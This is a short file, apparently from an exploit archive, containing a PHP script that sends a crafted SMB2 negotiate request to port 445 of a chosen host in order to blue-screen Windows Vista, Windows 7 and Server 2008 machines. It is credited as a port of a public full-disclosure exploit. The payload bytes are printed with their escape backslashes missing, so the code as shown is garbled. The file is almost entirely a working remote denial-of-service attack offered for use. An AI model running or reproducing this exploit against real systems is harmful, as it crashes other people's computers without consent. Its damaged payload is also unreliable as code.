lame-smb-bsod.txt
Posted on 10 September 2009
<?php /* * Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD * Author: Ricardo Almeida * email: ricardojba[at]aeiou[DoT]pt * * Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP) * */ if ($argc != 2) {die("Usage: lame-smb-bsod.php <host> ");} $host = $argv[1]; $payload = "x00x00x00x90". "xffx53x4dx42". "x72x00x00x00". "x00x18x53xc8". "x00x26". "x00x00x00x00x00x00x00x00x00x00xffxffxffxfe". "x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54". "x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31". "x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00". "x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57". "x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61". "x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c". "x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c". "x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e". "x30x30x32x00"; $mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $result = socket_connect($mysock, $host, 445); if ($result === false) echo "Connect failed. Reason: ($result) " . socket_strerror(socket_last_error($mysock)) . " "; else echo " Connected to $host "; echo "Bye, Bye Windowz.... "; socket_write($mysock, $payload, strlen($payload)); socket_close($mysock); --------------------------------------------------- Venha conhecer o novo AEIOU: http://www.aeiou.pt
